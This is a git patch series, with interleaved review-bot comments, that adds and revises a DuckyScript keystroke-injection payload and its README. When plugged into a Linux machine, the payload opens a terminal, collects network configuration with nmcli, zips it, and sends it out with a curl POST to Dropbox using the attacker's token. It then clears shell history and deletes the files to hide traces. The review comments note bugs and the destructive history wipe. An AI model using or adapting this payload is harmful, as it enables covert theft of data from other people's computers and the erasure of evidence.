From bf5c48ec2bc6239c9e0d4fbc0f4fbae7e61e321f Mon Sep 17 00:00:00 2001
From: Aleff
Date: Mon, 12 Jun 2023 11:58:29 +0200
Subject: [PATCH 1/3] Exfiltrate Linux Network Configuration
---
.../payload.txt | 95 +++++++++++++++++++
1 file changed, 95 insertions(+)
create mode 100644 payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt
diff --git a/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt
new file mode 100644
index 0000000..b7a7914
--- /dev/null
+++ b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt
@@ -0,0 +1,95 @@
+REM ##########################################################
+REM # |
+REM # Title : Exfiltrate Linux Network Configuration |
+REM # Author : Aleff |
+REM # Version : 1.0 |
+REM # Category : Exfiltration |
+REM # Target : Linux |
+REM # |
+REM ##########################################################
+
+REM Requirements:
+REM - Internet Connection
+REM - Dropbox Account
+REM - - DROPBOX_ACCESS_TOKEN
+
+DELAY 1000
+CTRL-ALT t
+
+DELAY 2000
+REM Required: Set here your Dropbox access TOKEN
+DEFINE TOKEN example
+STRING ACCESS_TOKEN="
+STRING TOKEN
+STRING "
+ENTER
+
+REM DELAY 500
+REM STRING USER_NAME=$(whoami)
+REM ENTER
+
+DELAY 500
+STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
+ENTER
+
+DELAY 500
+STRING ZIP_NAME="$RANDOM.zip"
+ENTER
+DELAY 500
+STRING ZIP_PATH="/home/$USER_NAME/Documents/$ZIP_NAME"
+ENTER
+
+REM Folder path
+DELAY 500
+STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/Documents" prefix-XXXXXXXXXX)
+ENTER
+
+DELAY 500
+STRING nmcli > "$TMP_FOLDER_PATH/nmcli.txt"
+ENTER
+
+DELAY 1000
+STRING nmcli connection show > "$TMP_FOLDER_PATH/nmcli_connection.txt"
+ENTER
+
+DELAY 1000
+STRING nmcli device show > "$TMP_FOLDER_PATH/nmcli_device.txt"
+ENTER
+
+DELAY 1000
+REM Delay for zipping operation, it depends by computer power and folder directory
+STRING zip -r "$ZIP_PATH" "$TMP_FOLDER_PATH"
+DELAY 3000
+
+
+REM Set yout Dropbox folder name
+DEFINE DROPBOX_FOLDER_NAME example
+STRING DROPBOX_FOLDER="/
+ENTER
+STRING DROPBOX_FOLDER_NAME
+ENTER
+STRING "
+ENTER
+DELAY 500
+
+DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
+STRING curl -X POST
+STRING DROPBOX_API_CONST
+STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
+ENTER
+
+DELAY 2000
+STRING history -c
+ENTER
+
+DELAY 500
+STRING rm -rf "$TMP_FOLDER_PATH"
+ENTER
+
+DELAY 500
+STRING rm -rf "$ZIP_PATH"
+ENTER
+
+DELAY 500
+STRING exit
+ENTER
From d62f16f914a7aef64f8abfd49bb4e196e7aa1590 Mon Sep 17 00:00:00 2001
From: aleff-github
Date: Mon, 12 Jun 2023 11:59:33 +0200
Subject: [PATCH 2/3] Create README.md
---
.../README.md | 27 +++++++++++++++++++
1 file changed, 27 insertions(+)
create mode 100644 payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md
diff --git a/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md
new file mode 100644
index 0000000..db8dadb
--- /dev/null
+++ b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/README.md
@@ -0,0 +1,27 @@
+
+# Exfiltrate Network Configuration - Linux ✅
+
+A script used to exfiltrate the network configuration on a Linux machine.
+
+**Category**: Exfiltrate, Execution
+
+## Description
+
+A script used to exfiltrate the network configuration on a Linux machine.
+
+Opens a shell, get the network card name, get the network configuration using nmcli, send the result to Dropbox, erase traces.
+
+## Getting Started
+
+### Dependencies
+
+* Internet Connection
+* Dropbox Token
+
+### Executing program
+
+* Plug in your device
+
+### Settings
+
+* Set the Dropbox token
\ No newline at end of file
From 1c7176bb4d846ba79bd91e6e3f29302365d83040 Mon Sep 17 00:00:00 2001
From: Kalani Helekunihi <324833+kalanihelekunihi@users.noreply.github.com>
Date: Mon, 12 Jun 2023 14:43:21 -0400
Subject: [PATCH 3/3] Update payload.txt
---
.../payload.txt | 81 +++++-------------
1 file changed, 22 insertions(+), 59 deletions(-)
diff --git a/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt
index b7a7914..d0ff809 100644
--- a/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt
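Review bot: `STRING RANDOM=$(shuf -i 1-999999999999 -n 1)` assigns to bash's special variable RANDOM (assuming the opened terminal runs bash, which the later `history -c` already presumes), and assigning RANDOM only reseeds the generator; the following `STRING ZIP_NAME="$RANDOM.zip"` therefore expands to a fresh 0–32767 value, not the shuf output, so the name never carries the number the line computes and the pair reads as if it did. At minimum document it, e.g. `REM NOTE: assigning RANDOM only reseeds bash's generator; $RANDOM below is a 0-32767 value, not the shuf result`. The same two lines come back as STRINGLN in PATCH 3/3 and keep the RANDOM name, so the note applies there as well.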
+++ b/payloads/library/exfiltration/ExfiltrateNetworkConfiguration_Linux/payload.txt 
@@ -13,83 +13,46 @@ REM - Internet Connection
 REM - Dropbox Account
 REM - - DROPBOX_ACCESS_TOKEN
 
-DELAY 1000
-CTRL-ALT t
+DEFINE #TOKEN example
+DEFINE #DROPBOX_FOLDER_NAME example
+DEFINE #DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
+
+
+DEFAULT_DELAY 500
+CTRL ALT t
 
 DELAY 2000
 REM Required: Set here your Dropbox access TOKEN
-DEFINE TOKEN example
-STRING ACCESS_TOKEN="
-STRING TOKEN
-STRING "
-ENTER
+STRINGLN ACCESS_TOKEN="#TOKEN"
 
-REM DELAY 500
 REM STRING USER_NAME=$(whoami)
 REM ENTER
 
-DELAY 500
-STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
-ENTER
+STRINGLN RANDOM=$(shuf -i 1-999999999999 -n 1)
 
-DELAY 500
-STRING ZIP_NAME="$RANDOM.zip"
-ENTER
-DELAY 500
-STRING ZIP_PATH="/home/$USER_NAME/Documents/$ZIP_NAME"
-ENTER
+STRINGLN ZIP_NAME="$RANDOM.zip"
+STRINGLN ZIP_PATH="/home/$USER_NAME/Documents/$ZIP_NAME"
 
 REM Folder path
-DELAY 500
-STRING TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/Documents" prefix-XXXXXXXXXX)
-ENTER
+STRINGLN TMP_FOLDER_PATH=$(mktemp -d -p "/home/$USER_NAME/Documents" prefix-XXXXXXXXXX)
 
-DELAY 500
-STRING nmcli > "$TMP_FOLDER_PATH/nmcli.txt"
-ENTER
+STRINGLN nmcli > "$TMP_FOLDER_PATH/nmcli.txt"
 
-DELAY 1000
-STRING nmcli connection show > "$TMP_FOLDER_PATH/nmcli_connection.txt"
-ENTER
+STRINGLN nmcli connection show > "$TMP_FOLDER_PATH/nmcli_connection.txt"
 
-DELAY 1000
-STRING nmcli device show > "$TMP_FOLDER_PATH/nmcli_device.txt"
-ENTER
+STRINGLN nmcli device show > "$TMP_FOLDER_PATH/nmcli_device.txt"
 
-DELAY 1000
 REM Delay for zipping operation, it depends by computer power and folder directory
-STRING zip -r "$ZIP_PATH" "$TMP_FOLDER_PATH"
+STRINGLN zip -r "$ZIP_PATH" "$TMP_FOLDER_PATH"
 DELAY 3000
 
-
 REM Set yout Dropbox folder name
-DEFINE DROPBOX_FOLDER_NAME example
-STRING DROPBOX_FOLDER="/
-ENTER
-STRING DROPBOX_FOLDER_NAME
-ENTER
-STRING "
-ENTER
-DELAY 500
+STRINGLN DROPBOX_FOLDER="/#DROPBOX_FOLDER_NAME"
 
-DEFINE DROPBOX_API_CONST https://content.dropboxapi.com/2/files/upload
-STRING curl -X POST
-STRING DROPBOX_API_CONST
-STRING --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
-ENTER
+STRINGLN curl -X POST #DROPBOX_API_CONST --header "Authorization: Bearer $ACCESS_TOKEN" --header "Dropbox-API-Arg: {\"path\": \"$DROPBOX_FOLDER\",\"mode\": \"add\",\"autorename\": true,\"mute\": false}" --header "Content-Type: application/octet-stream" --data-binary "@$ZIP_PATH"
 
 DELAY 2000
-STRING history -c
-ENTER
-
-DELAY 500
-STRING rm -rf "$TMP_FOLDER_PATH"
-ENTER
-
-DELAY 500
-STRING rm -rf "$ZIP_PATH"
-ENTER
-
-DELAY 500
-STRING exit
-ENTER
+STRINGLN history -c
+STRINGLN rm -rf "$TMP_FOLDER_PATH"
+STRINGLN rm -rf "$ZIP_PATH"
+STRINGLN exit
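Review bot: `REM Required: Set here your Dropbox access TOKEN` is still placed above `STRINGLN ACCESS_TOKEN="#TOKEN"`, but after this change the value a user must edit is `DEFINE #TOKEN example` at the top of the hunk, and `REM Set yout Dropbox folder name` likewise sits over `STRINGLN DROPBOX_FOLDER="/#DROPBOX_FOLDER_NAME"` instead of `DEFINE #DROPBOX_FOLDER_NAME example`, so a reader following the comments edits the wrong lines. Move the instructions to the DEFINE block, e.g. `REM Required: replace the two "example" placeholders below with your Dropbox access token and folder name`, and fix the typo `yout` to `your`. Separately, with default bash settings `STRINGLN history -c` followed by `STRINGLN exit` makes the shell write an empty list to ~/.bash_history on exit, discarding the user's entire prior history rather than only this session's entries; that destructive side effect deserves a line such as `REM NOTE: history -c then exit clears the user's whole saved history, not only this session`.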